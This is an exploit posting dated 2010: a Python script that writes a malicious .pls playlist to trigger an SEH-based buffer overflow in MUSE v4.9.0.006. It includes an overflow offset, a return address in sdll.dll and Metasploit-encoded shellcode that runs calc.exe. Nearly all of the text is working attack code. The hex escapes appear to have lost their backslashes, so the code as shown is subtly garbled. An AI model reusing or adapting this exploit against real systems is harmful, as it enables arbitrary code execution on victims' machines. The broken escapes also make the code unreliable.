
muse_pls.py.txt

Posted on 17 August 2010

# Exploit Title: MUSE v4.9.0.006 (.pls) Local Universal Buffer Overflow [SEH] # Date: August 17, 2010 # Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com) # Software Link: http://download.cnet.com/MUSE/3000-2140_4-42511.html # Version: 4.9.0.006 # Tested on: Windows XP SP3 En payload = "x41" * 1376 payload += "xebx06x90x90" payload += "xAAx0cx02x10" # 10020CAA sdll.dll universal payload += "x90" * 16 # win32_exec - EXITFUNC=seh CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com payload += ("xebx03x59xebx05xe8xf8xffxffxffx48x49x49x49x49x49" "x49x49x49x49x49x49x49x49x49x49x49x49x51x5ax6ax68" "x58x30x41x31x50x42x41x6bx41x41x78x32x41x42x41x32" "x42x41x30x42x41x58x50x38x41x42x75x58x69x49x6cx49" "x78x71x54x55x50x37x70x35x50x6cx4bx53x75x55x6cx6e" "x6bx53x4cx74x45x62x58x56x61x4ax4fx4cx4bx30x4fx42" "x38x6ex6bx73x6fx67x50x36x61x48x6bx70x49x6cx4bx66" "x54x4ex6bx64x41x38x6ex74x71x49x50x7ax39x6ex4cx4e" "x64x6bx70x52x54x44x47x4fx31x6bx7ax56x6dx46x61x5a" "x62x5ax4bx78x74x67x4bx70x54x76x44x77x74x42x55x78" "x65x6ex6bx53x6fx36x44x37x71x58x6bx30x66x4ex6bx44" "x4cx62x6bx4ex6bx43x6fx57x6cx57x71x7ax4bx6cx4bx75" "x4cx6ex6bx36x61x38x6bx6ex69x71x4cx44x64x75x54x79" "x53x55x61x69x50x31x74x6ex6bx67x30x64x70x4fx75x59" "x50x43x48x56x6cx6ex6bx41x50x76x6cx6cx4bx72x50x45" "x4cx6cx6dx6ex6bx71x78x77x78x48x6bx66x69x4ex6bx6f" "x70x4cx70x47x70x33x30x53x30x4cx4bx75x38x65x6cx43" "x6fx76x51x78x76x75x30x50x56x4bx39x4bx48x6dx53x6f" "x30x71x6bx76x30x35x38x78x70x4cx4ax75x54x63x6fx33" "x58x4cx58x59x6ex6dx5ax34x4ex56x37x6bx4fx38x67x55" "x33x45x31x30x6cx72x43x76x4ex53x55x53x48x70x65x37" "x70x68") payload += "x90" * 642 try: print "[+] Creating exploit file.." exploit = open('muse.pls','w'); exploit.write(payload); exploit.close(); print "[+] Writing", len(payload), "bytes to muse.pls" print "[+] Exploit file created!" except: print "[-] Error: You do not have correct permissions.."

 
